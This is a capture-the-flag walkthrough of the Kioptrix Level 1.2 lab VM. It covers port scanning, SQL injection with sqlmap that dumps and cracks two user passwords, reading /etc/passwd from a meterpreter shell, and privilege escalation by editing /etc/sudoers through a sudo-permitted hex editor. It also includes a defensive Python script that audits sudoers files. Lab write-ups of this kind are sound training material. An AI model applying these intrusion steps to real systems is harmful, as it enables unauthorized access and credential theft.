VulnHub Kioptrix: Level 1.2 (#3) Walkthrough

Name: Kioptrix: Level 1.2 (#3)
Date release: 18 Apr 2011
Host: kioptrix3.com
IP: 192.168.50.34

Information Gathering

Ports

root@kali:~# nmap kioptrix3.com -p- --open
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-17 09:18 HKT
Nmap scan report for kioptrix3.com (192.168.50.34)
Host is up (0.00085s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:E2:F0:0A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.76 seconds

Web Applications

  • Gallarific
  • LotusCMS
  • phpMyAdmin 2.11.3

Web Application Vulnerabilities

  • Gallarific
    • gallery.php SQL Injection
  • LotusCMS
    • RCE
    • Code Injection

Physical Path

At this point I have www-data privileges and access to the database. After a number of attempts it turned out that privilege escalation through a Linux kernel exploit would not work the way it did on earlier boxes; many exploits failed, so I had to find a way forward with what was already available.

Privilege Escalation

Found the system users loneferret and dreg

meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

The lastlog command shows that user loneferret has logged into the system

lastlog
Username         Port     From             Latest
root             tty1                      Mon Apr 18 11:29:13 -0400 2011
...
loneferret       pts/0    3llxkxs-mbp      Thu Jan 16 09:38:36 -0500 2020
dreg                                       **Never logged in**

Listing loneferret's home directory reveals CompanyPolicy.README and checksec.sh, both owned by root

ls /home/loneferret -lsa
total 68
 4 drwxr-xr-x 3 loneferret loneferret  4096 Jan 16 09:22 .
 4 drwxr-xr-x 5 root       root        4096 Apr 16  2011 ..
 4 -rw-r--r-- 1 loneferret users        497 Jan 16 10:37 .bash_history
 4 -rw-r--r-- 1 loneferret loneferret   220 Apr 11  2011 .bash_logout
 4 -rw-r--r-- 1 loneferret loneferret  2940 Apr 11  2011 .bashrc
 4 -rw-r--r-- 1 loneferret root        1678 Jan 16 09:25 .htcfg2
 4 -rw------- 1 root       root          15 Apr 15  2011 .nano_history
 4 -rw-r--r-- 1 loneferret loneferret   586 Apr 11  2011 .profile
 4 drwx------ 2 loneferret loneferret  4096 Apr 14  2011 .ssh
 0 -rw-r--r-- 1 loneferret loneferret     0 Apr 11  2011 .sudo_as_admin_successful
 4 -rw-r--r-- 1 root       root         224 Apr 16  2011 CompanyPolicy.README
28 -rwxrwxr-x 1 root       root       26275 Jan 12  2011 checksec.sh

CompanyPolicy.README is a notice telling new employees to use sudo ht to edit and view files. Since loneferret can use sudo, obtaining loneferret's password and logging in over SSH should be enough to get root.

cat /home/loneferret/CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO

Dumping gallery.dev_accounts with sqlmap shows it holds the passwords of the two system users

Database: gallery
Table: dev_accounts
[2 entries]
+----+---------------------------------------------+------------+
| id | password                                    | username   |
+----+---------------------------------------------+------------+
| 1  | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |
| 2  | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+

Logged in as loneferret successfully

sudo cat is not permitted; trying the ht editor mentioned in the document, /etc/sudoers can be opened and edited

loneferret@Kioptrix3:~$ sudo cat /etc/sudoers
[sudo] password for loneferret:
Sorry, user loneferret is not allowed to execute '/bin/cat /etc/sudoers' as root on Kioptrix3.
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers
loneferret@Kioptrix3:~$ which su
/bin/su

The sudoers file shows that the su command is explicitly disallowed

Use ht to change !/usr/bin/su to /bin/su; here the replaced bytes were overwritten with the space character (0x20)

After saving, run sudo su - and a root shell is obtained.
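As a defender's check on the misconfiguration used above (an editor allowed through sudo, paired with a '!' deny entry), here is an added example that is not part of the original writeup: a small sudoers auditor. The sudoers text it parses is a constructed sample, and FILE_WRITING_TOOLS and the function names are my own.

```python
import re

# Constructed sample (not the real file from the box), built around the pattern
# the writeup describes: an editor permitted via sudo next to a '!' deny for su.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
dreg    ALL=(ALL) NOPASSWD: /usr/bin/apt-get
"""

# Programs that, run as root, can open or rewrite any file (editors, hex editors,
# pagers). Allowing one via sudo is write access to /etc/sudoers, as 'ht' shows here.
FILE_WRITING_TOOLS = {"ht", "vi", "vim", "nano", "emacs", "less", "more", "ed", "hexedit"}

def parse_user_specs(text):
    """Yield (user, runas, tags, commands) for each user specification line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = re.match(r"^(\S+)\s+(\S+?)=(?:\(([^)]*)\))?\s*(.*)$", line)
        if not m:
            continue
        user, _host, runas, rest = m.groups()
        tags, cmds = set(), []
        for part in (p.strip() for p in rest.split(",")):
            # Tags such as NOPASSWD: prefix a command; peel them off and record them.
            while ":" in part and part.split(":", 1)[0].isupper():
                tag, part = (s.strip() for s in part.split(":", 1))
                tags.add(tag)
            if part:
                cmds.append(part)
        yield user, runas or "root", tags, cmds

def audit_sudoers(text):
    """Return one finding string per risky entry; an empty list means nothing flagged."""
    findings = []
    for user, runas, tags, cmds in parse_user_specs(text):
        nopw = " (NOPASSWD)" if "NOPASSWD" in tags else ""
        for cmd in cmds:
            if cmd.startswith("!"):
                # sudoers(5) documents '!' excludes as unreliable: they block one path, not a program.
                findings.append(f"{user}: deny rule '{cmd}' is not an effective restriction")
            elif cmd.split("/")[-1].split()[0] in FILE_WRITING_TOOLS:
                findings.append(f"{user}: '{cmd}' as {runas} can rewrite any file, "
                                f"including /etc/sudoers{nopw}")
    return findings
```

Running audit_sudoers on the real /etc/sudoers (and the files in /etc/sudoers.d) flags exactly the two entries that made this box fall: the bypassable '!' rule and the root-level editor.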

Summary

It reads smoothly here, but in practice there were many detours. For instance, with sqlmap I did not look at gallery.dev_accounts first but at gallery.gallarific_users, which gave dreg's password; after logging in as dreg there was no sudo permission at all.
